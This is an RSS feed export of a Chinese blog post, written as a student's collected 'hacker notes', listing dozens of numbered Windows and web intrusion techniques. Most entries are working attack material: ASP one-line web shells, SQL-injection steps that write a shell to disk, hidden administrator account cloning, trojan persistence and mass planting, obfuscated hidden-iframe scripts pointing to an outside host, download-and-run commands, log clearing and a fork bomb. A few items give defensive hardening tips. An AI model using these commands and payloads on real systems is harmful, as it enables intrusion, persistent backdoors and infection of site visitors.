<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>开心技术乐园 &#187; 笔记</title>
	<atom:link href="http://www.hack520.org/tag/%e7%ac%94%e8%ae%b0/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hack520.org</link>
	<description>原创技术乐园</description>
	<lastBuildDate>Tue, 20 Dec 2011 03:29:13 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>我大学里学习黑客的笔记，在此留一份</title>
		<link>http://www.hack520.org/daxue-hacker-notes</link>
		<comments>http://www.hack520.org/daxue-hacker-notes#comments</comments>
		<pubDate>Tue, 12 Jan 2010 09:08:06 +0000</pubDate>
		<dc:creator>野球小子</dc:creator>
				<category><![CDATA[黑客地带]]></category>
		<category><![CDATA[笔记]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://hi.hack520.org/hacker-notes</guid>
		<description><![CDATA[本日志专门收集整理平时学习过程的黑客技术与技巧。 1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下， cacls C:\windows\system32 /G hqw20:R 思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入 恢复方法：C:\&#62;cacls C:\windows\system32 /G hqw20:F 2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。 3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。 4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号 5、利用INF文件来修改注册表 [Version] Signature=&#8221;$CHICAGO$&#8221; [Defaultinstall] addREG=Ating [Ating] HKCU,&#8221;Software\Microsoft\Windows\CurrentVersion\Policies\system&#8221;,&#8221;disableregistrytools&#8221;,&#8221;0&#215;00010001&#8243;,&#8221;1&#8243; 以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下： rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径 其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU HKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU HKEY_CURRENT_CONFIG 简写为 HKCC 0&#215;00000000 代表的是 字符串值，0&#215;00010001 代表的是 DWORD值 &#8220;1&#8243;这里代表是写入或删除注册表键值中的具体数据 6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画, 多了一步就是在防火墙里添加个端口，然后导出其键值 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] 7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽 在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone" title="我的黑客笔记" src="http://img.hack520.org/2010-01/hacker.jpg" alt="我的黑客笔记" width="480" height="442" /></p>
<p><span style="color: #ff0000;"><strong>本日志专门收集整理平时学习过程的黑客技术与技巧。</strong></span><br />
<span id="more-455"></span><br />
1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下，<br />
cacls C:\windows\system32 /G hqw20:R<br />
思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入<br />
恢复方法：C:\&gt;cacls C:\windows\system32 /G hqw20:F</p>
<p>2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。</p>
<p>3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。</p>
<p>4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号</p>
<p>5、利用INF文件来修改注册表<br />
[Version]<br />
Signature=&#8221;$CHICAGO$&#8221;<br />
[Defaultinstall]<br />
addREG=Ating<br />
[Ating]<br />
HKCU,&#8221;Software\Microsoft\Windows\CurrentVersion\Policies\system&#8221;,&#8221;disableregistrytools&#8221;,&#8221;0&#215;00010001&#8243;,&#8221;1&#8243;<br />
以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：<br />
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径<br />
其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU<br />
HKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU<br />
HKEY_CURRENT_CONFIG 简写为 HKCC<br />
0&#215;00000000 代表的是 字符串值，0&#215;00010001 代表的是 DWORD值<br />
&#8220;1&#8243;这里代表是写入或删除注册表键值中的具体数据</p>
<p>6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,<br />
多了一步就是在防火墙里添加个端口，然后导出其键值<br />
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]</p>
<p>7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽<br />
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。</p>
<p>8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。</p>
<p>9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,<br />
可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。</p>
<p>10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”</p>
<p>11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，<br />
用法：xsniff –pass –hide –log pass.txt</p>
<p>12、google搜索的艺术<br />
搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”<br />
或“字符串的语法错误”可以找到很多sql注入漏洞。</p>
<p>13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。</p>
<p>14、cmd中输入 nc –vv –l –p 1987<br />
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃</p>
<p>15、制作T++木马，先写个ating.hta文件,内容为<br />
&lt;script language=&#8221;VBScript&#8221;&gt;<br />
set wshshell=createobject (&#8220;wscript.shell&#8221; )<br />
a=wshshell.run(&#8220;你马的名称&#8221;,1)<br />
window.close<br />
&lt;/script&gt;<br />
再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。</p>
<p>16、搜索栏里输入<br />
关键字%&#8217;and 1=1 and &#8216;%&#8217;=&#8217;<br />
关键字%&#8217;and 1=2 and &#8216;%&#8217;=&#8217;<br />
比较不同处 可以作为注入的特征字符</p>
<p>17、挂马代码&lt;html&gt;<br />
&lt;iframe src=&#8221;马的地址&#8221; width=&#8221;0&#8243; height=&#8221;0&#8243; frameborder=&#8221;0&#8243;&gt;&lt;/iframe&gt;<br />
&lt;/html&gt;</p>
<p>18、开启regedt32的SAM的管理员权限 检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,<br />
net localgroup administrators还是可以看出Guest是管理员来。</p>
<p>19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等<br />
用法: 安装： instsrv.exe 服务名称 路径<br />
卸载： instsrv.exe 服务名称 REMOVE<br />
[url=/soft/instsrv.rar]点击本站下载[/url]</p>
<p>21、SQL注入时工具&#8212;Internet选项&#8212;高级里找到显示友好的错误信息勾去掉<br />
不能注入时要第一时间想到%5c暴库。</p>
<p>22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~</p>
<p>23、缺少xp_cmdshell时<br />
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname=&#8217;xplog70.dll&#8217;<br />
假如恢复不成功,可以尝试直接加用户(针对开3389的)<br />
declare @o int<br />
exec sp_oacreate &#8216;wscript.shell&#8217;,@o out<br />
exec sp_oamethod @o,&#8217;run&#8217;,NULL,&#8217;cmd.exe /c net user ating ating /add&#8217; 再提到管理员</p>
<p>24.批量种植木马.bat<br />
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中<br />
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间<br />
扫描地址.txt里每个主机名一行 用\\开头</p>
<p>25、在程序上传shell过程中，程序不允许包含&lt;% %&gt;标记符号的内容的文件上传,比如蓝屏最小 的asp木马&lt;%execute request(&#8220;l&#8221;)%&gt;,我们来把他的标签换一下： &lt;script language=VBScript runat=server&gt;execute request(&#8220;l&#8221;)&lt;/Script&gt; 保存为.asp,程序照样执行。</p>
<p>26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.<br />
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.<br />
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马</p>
<p>27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP<br />
然后用#clear logg和#clear line vty *删除日志</p>
<p>28、电脑坏了省去重新安装系统的方法<br />
纯dos下执行，<br />
xp:copy C:\WINDOWS\repair\*.* 到c:\windows\system32\config<br />
2k: copy C:\winnt\repair\*.* 到c:\winnt\system32\config</p>
<p>29、解决TCP/IP筛选 在注册表里有三处，分别是：<br />
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip<br />
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip<br />
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip<br />
分别用<br />
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip<br />
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip<br />
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip<br />
命令来导出注册表项<br />
然后把三个文件里的EnableSecurityFilters&#8221;=dword:00000001，<br />
改成EnableSecurityFilters&#8221;=dword:00000000 再将以上三个文件分别用<br />
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。</p>
<p>30、使CHM木马无法在本地运行木马程序 将注册表&#8221;HKEY_CURRENT_U<br />
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0&#8243;下的1004项的值由原来十进制的0改为十六进制的3</p>
<p>31、全手工打造开3389工具<br />
打开记事本，编辑内容如下：<br />
echo [Components] &gt; c:\sql<br />
echo TSEnable = on &gt;&gt; c:\sql<br />
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q<br />
编辑好后存为BAT文件，上传至肉鸡，执行</p>
<p>32、挂马js代码document.write(&#8216;&lt;iframe height=0 width=0 src=&#8221;木马地址.htm&#8221;&gt;&lt;/iframe&gt;&#8217;);保存到js页面里 可让所有页面挂马</p>
<p>33、让服务器重启<br />
写个bat死循环:<br />
@echo off<br />
:loop1<br />
cls<br />
start cmd.exe<br />
goto loop1<br />
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启</p>
<p>34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，<br />
@echo off<br />
date /t &gt;c:/3389.txt<br />
time /t &gt;&gt;c:/3389.txt<br />
attrib +s +h c:/3389.bat<br />
attrib +s +h c:/3389.txt<br />
netstat -an |find &#8220;ESTABLISHED&#8221; |find &#8220;:3389&#8243; &gt;&gt;c:/3389.txt<br />
并保存为3389.bat<br />
打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号</p>
<p>35、有时候提不了权限的话，试试这个命令，在命令行里输入：<br />
start http://www.hack520.org/muma.htm然后点执行。（muma.htm是你上传好的漏洞网页）<br />
输入：netstat -an | find &#8220;28876&#8243; 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。</p>
<p>36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件<br />
echo open 你的FTP空间地址 &gt;c:\1.bat //输入你的FTP地址<br />
echo 你的FTP账号 &gt;&gt;c:\1.bat //输入账号<br />
echo 你的FTP密码 &gt;&gt;c:\1.bat //输入密码<br />
echo bin &gt;&gt;c:\1.bat //登入<br />
echo get 你的木马名 c:\ ating.exe &gt;&gt;c:\1.bat //下载某文件到某地方并改名为什么<br />
echo bye &gt;&gt;c:\1.bat //退出<br />
然后执行ftp -s:c:\1.bat即可</p>
<p>37、修改注册表开3389两法<br />
（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表<br />
echo Windows Registry Editor Version 5.00 &gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] &gt;&gt;3389.reg<br />
echo &#8220;Enabled&#8221;=&#8221;0&#8243; &gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows<br />
NT\CurrentVersion\Winlogon] &gt;&gt;3389.reg<br />
echo &#8220;ShutdownWithoutLogon&#8221;=&#8221;0&#8243; &gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]<br />
&gt;&gt;3389.reg<br />
echo &#8220;EnableAdminTSRemote&#8221;=dword:00000001 &gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]<br />
&gt;&gt;3389.reg<br />
echo &#8220;TSEnabled&#8221;=dword:00000001 &gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] &gt;&gt;3389.reg<br />
echo &#8220;Start&#8221;=dword:00000002 &gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]<br />
&gt;&gt;3389.reg<br />
echo &#8220;Start&#8221;=dword:00000002 &gt;&gt;3389.reg<br />
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] &gt;&gt;3389.reg<br />
echo &#8220;Hotkey&#8221;=&#8221;1&#8243; &gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal<br />
Server\Wds\rdpwd\Tds\tcp] &gt;&gt;3389.reg<br />
echo &#8220;PortNumber&#8221;=dword:00000D3D &gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal<br />
Server\WinStations\RDP-Tcp] &gt;&gt;3389.reg<br />
echo &#8220;PortNumber&#8221;=dword:00000D3D &gt;&gt;3389.reg<br />
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。<br />
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)<br />
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效<br />
（2）winxp和win2003终端开启<br />
用以下ECHO代码写一个REG文件：<br />
echo Windows Registry Editor Version 5.00&gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal<br />
Server]&gt;&gt;3389.reg<br />
echo &#8220;fDenyTSConnections&#8221;=dword:00000000&gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal<br />
Server\Wds\rdpwd\Tds\tcp]&gt;&gt;3389.reg<br />
echo &#8220;PortNumber&#8221;=dword:00000d3d&gt;&gt;3389.reg<br />
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal<br />
Server\WinStations\RDP-Tcp]&gt;&gt;3389.reg<br />
echo &#8220;PortNumber&#8221;=dword:00000d3d&gt;&gt;3389.reg<br />
然后regedit /s 3389.reg del 3389.reg<br />
XP下不论开终端还是改终端端口都不需重启</p>
<p>38、找到SA密码为空的肉鸡一定要第一时间改SA密码，防止别人和我们抢肉吃<br />
用查询分析器运行 EXEC sp_password NULL, &#8216;你要改的密码&#8217;, &#8216;sa&#8217;</p>
<p>39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！<br />
（1）数据库文件名应复杂并要有特殊字符<br />
（2）不要把数据库名称写在conn.asp里，要用ODBC数据源<br />
将conn.asp文档中的<br />
DBPath = Server.MapPath(&#8220;数据库.mdb&#8221;)<br />
conn.Open &#8220;driver={Microsoft Access Driver (*.mdb)};dbq=&#8221; ＆ DBPath</p>
<p>修改为：conn.open &#8220;ODBC数据源名称,&#8221; 然后指定数据库文件的位置<br />
（3）不放在WEB目录里</p>
<p>40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉<br />
可以写两个bat文件<br />
@echo off<br />
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe<br />
@del c:\winnt\system32\query.exe<br />
@del %SYSTEMROOT%\system32\dllcache\query.exe<br />
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的</p>
<p>@echo off<br />
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe<br />
@del c:\winnt\system32\tsadmin.exe<br />
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex</p>
<p>41、映射对方盘符<br />
telnet到他的机器上，<br />
net share 查看有没有默认共享 如果没有，那么就接着运行<br />
net share c$=c:<br />
net share现在有c$<br />
在自己的机器上运行<br />
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K</p>
<p>42、一些很有用的老知识<br />
type c:\boot.ini ( 查看系统版本 )<br />
net start (查看已经启动的服务)<br />
query user ( 查看当前终端连接 )<br />
net user ( 查看当前用户 )<br />
net user 用户 密码/add ( 建立账号 )<br />
net localgroup administrators 用户 /add (提升某用户为管理员)<br />
ipconfig -all ( 查看IP什么的 )<br />
netstat -an ( 查看当前网络状态 )<br />
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)<br />
克隆时Administrator对应1F4<br />
guest对应1F5<br />
tsinternetuser对应3E8</p>
<p>43、如果对方没开3389，但是装了Remote Administrator Service<br />
用这个命令F:\ftp.exe &#8220;regedit -s F:\longyi.biz\RAdmin.reg&#8221; 连接<br />
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息<br />
先备份对方的F:\ftp.exe &#8220;regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin&#8221;</p>
<p>44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）<br />
本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）</p>
<p>45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）<br />
echo Set x= CreateObject(^&#8221;Microsoft.XMLHTTP^&#8221;):x.Open<br />
^&#8221;GET^&#8221;,LCase(WScript.Arguments(0)),0:x.Send():Set s =<br />
CreateObject(^&#8221;ADODB.Stream^&#8221;):s.Mode = 3:s.Type =<br />
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 &gt;ating.vbs<br />
（这是完整的一句话，其中没有换行符）<br />
然后下载:<br />
cscript down.vbs http://www.hack520.org/hack.exe hack.exe</p>
<p>46、一句话木马成功依赖于两个条件：<br />
１、服务端没有禁止adodb.Stream或FSO组件<br />
２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。</p>
<p>47、利用DB_OWNER权限进行手工备份一句话木马的代码：<br />
;alter database utsz set RECOVERY FULL&#8211;<br />
;create table cmd (a image)&#8211;<br />
;backup log utsz to disk = &#8216;D:\cmd&#8217; with init&#8211;<br />
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)&#8211;<br />
;backup log utsz to disk = &#8216;D:\utsz_web\utsz\hacker.asp&#8217;&#8211;<br />
注：0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。</p>
<p>48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：</p>
<p>用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options<br />
所有会话用 &#8216;all&#8217;。<br />
-s sessionid列出会话的信息。<br />
-k sessionid终止会话。<br />
-m sessionid发送消息到会话。</p>
<p>config配置 telnet 服务器参数。</p>
<p>common_options 为:<br />
-u user 指定要使用其凭据的用户<br />
-p password 用户密码</p>
<p>config_options 为:<br />
 dom = domain 设定用户的默认域<br />
 ctrlakeymap = yes|no 设定 ALT 键的映射<br />
 timeout = hh:mm:ss 设定空闲会话超时值<br />
 timeoutactive = yes|no 启用空闲会话。<br />
 maxfail = attempts 设定断开前失败的登录企图数。<br />
 maxconn = connections设定最大连接数。<br />
 port = number设定 telnet 端口。<br />
 sec = [+/-]NTLM [+/-]passwd<br />
设定身份验证机构<br />
 fname = file 指定审计文件名。<br />
 fsize = size 指定审计文件的最大尺寸(MB)。<br />
 mode = console|stream指定操作模式。<br />
 auditlocation = eventlog|file|both<br />
指定记录地点<br />
 audit = [+/-]user [+/-]fail [+/-]admin</p>
<p>49、例如:在IE上访问:<br />
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/<br />
hack.txt里面的代码是：<br />
&lt;body&gt; &lt;META HTTP-EQUIV=&#8221;Refresh&#8221; CONTENT=&#8221;5;URL=http://www.hack520.org/&#8221;&gt;<br />
把这个hack.txt发到你空间就可以了！<br />
这个可以利用来做网马哦！</p>
<p>50、autorun的病毒可以通过手动限制！<br />
1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！<br />
2，打开盘符用右键打开！切忌双击盘符～<br />
3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！</p>
<p>51、log备份时的一句话木马：<br />
a).&lt;%%25Execute(request(&#8220;go&#8221;))%%25&gt;<br />
b).&lt;%Execute(request(&#8220;go&#8221;))%&gt;<br />
c).%&gt;&lt;%execute request(&#8220;go&#8221;)%&gt;&lt;%<br />
d).&lt;script language=VBScript runat=server&gt;execute request(&#8220;sb&#8221;)&lt;/Script&gt;<br />
e).&lt;%25Execute(request(&#8220;l&#8221;))%25&gt;<br />
f).&lt;%if request(&#8220;cmd&#8221;)&lt;&gt;&#8221;" then execute request(&#8220;pass&#8221;)%&gt;</p>
<p>52、at &#8220;12:17&#8243; /interactive cmd<br />
执行后可以用AT命令查看新加的任务<br />
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。</p>
<p>53、隐藏ASP后门的两种方法<br />
1、建立非标准目录：mkdir images..\<br />
拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp<br />
通过web访问ASP木马：http://ip/images../news.asp?action=login<br />
如何删除非标准目录：rmdir images..\ /s<br />
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:<br />
mkdir programme.asp<br />
新建1.txt文件内容：&lt;!&#8211;#include file=”12.jpg”&#8211;&gt;<br />
新建12.jpg文件内容：&lt;%execute(request(&#8220;l&#8221;))%&gt; 或使用GIF与ASP合并后的文件<br />
attrib +H +S programme.asp<br />
通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt</p>
<p>54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。<br />
然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。</p>
<p>55、JS隐蔽挂马<br />
1.<br />
var tr4c3=&#8221;&lt;iframe src=ht&#8221;;<br />
tr4c3 = tr4c3+&#8221;tp:/&#8221;;<br />
tr4c3 = tr4c3+&#8221;/ww&#8221;;<br />
tr4c3 = tr4c3+&#8221;w.tr4&#8243;;<br />
tr4c3 = tr4c3+&#8221;c3.com/inc/m&#8221;;<br />
tr4c3 = tr4c3+&#8221;m.htm style=&#8221;display:none&#8221;&gt;&lt;/i&#8221;;<br />
tr4c3 =tr4c3+&#8221;frame&gt;&#8217;&#8221;;<br />
document.write(tr4c3);<br />
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。</p>
<p>2.<br />
转换进制，然后用EVAL执行。如<br />
eval(&#8220;\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73&#8243;);<br />
不过这个有点显眼。<br />
3.<br />
document.write (&#8216;&lt;iframe src=http://www.tr4c3.com/inc/mm.htm style=&#8221;display:none&#8221;&gt;&lt;/iframe&gt;&#8217;);<br />
最后一点，别忘了把文件的时间也修改下。</p>
<p>56.3389终端入侵常用DOS命令<br />
taskkill  taskkill /PID 1248 /t</p>
<p>tasklist  查进程</p>
<p>cacls &#8220;C:\Program Files\ewido anti-spyware 4.0\guard.exe&#8221; /d:everyone  改、降低某文件权限<br />
iisreset /reboot<br />
tsshutdn /reboot /delay:1    重起服务器</p>
<p>logoff 12  要使用会话 ID（例如，会话 12）从会话中注销用户，</p>
<p>query user  查看当前终端用户在线情况</p>
<p>要显示有关所有会话使用的进程的信息，请键入：query process *</p>
<p>要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2</p>
<p>要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2</p>
<p>要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02</p>
<p>命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启</p>
<p>命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统</p>
<p>命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。</p>
<p>命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机</p>
<p>56、在地址栏或按Ctrl+O，输入：<br />
javascript:s=document.documentElement.outerHTML;document.write(&#8216;&lt;body&gt;&lt;/body&gt;&#8217;);document.body.innerText=s;</p>
<p>源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。</p>
<p>57、net user的时候，是不能显示加$的用户，但是如果不处理的话，<br />
用net localgroup administrators是可以看到管理组下，加了$的用户的。</p>
<p>58、 sa弱口令相关命令</p>
<p>一.更改sa口令方法：<br />
用sql综合利用工具连接后，执行命令：<br />
exec sp_password NULL,&#8217;20001001&#8242;,&#8217;sa&#8217;<br />
(提示：慎用!)</p>
<p>二.简单修补sa弱口令.</p>
<p>方法1:查询分离器连接后执行：<br />
if exists (select * from<br />
dbo.sysobjects where id = object_id(N&#8217;[dbo].[xp_cmdshell]&#8216;) and<br />
OBJECTPROPERTY(id, N&#8217;IsExtendedProc&#8217;) = 1)</p>
<p>exec sp_dropextendedproc N&#8217;[dbo].[xp_cmdshell]&#8216;</p>
<p>GO</p>
<p>然后按F5键命令执行完毕</p>
<p>方法2:查询分离器连接后<br />
第一步执行：use master<br />
第二步执行：sp_dropextendedproc &#8216;xp_cmdshell&#8217;<br />
然后按F5键命令执行完毕</p>
<p>三.常见情况恢复执行xp_cmdshell.</p>
<p>1  未能找到存储过程&#8217;master..xpcmdshell&#8217;.<br />
恢复方法：查询分离器连接后,<br />
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =&#8217;xplog70.dll&#8217;declare @o int<br />
第二步执行:sp_addextendedproc &#8216;xp_cmdshell&#8217;, &#8216;xpsql70.dll&#8217;<br />
然后按F5键命令执行完毕</p>
<p>2  无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）<br />
恢复方法：查询分离器连接后,<br />
第一步执行：sp_dropextendedproc &#8220;xp_cmdshell&#8221;<br />
第二步执行：sp_addextendedproc &#8216;xp_cmdshell&#8217;, &#8216;xpsql70.dll&#8217;<br />
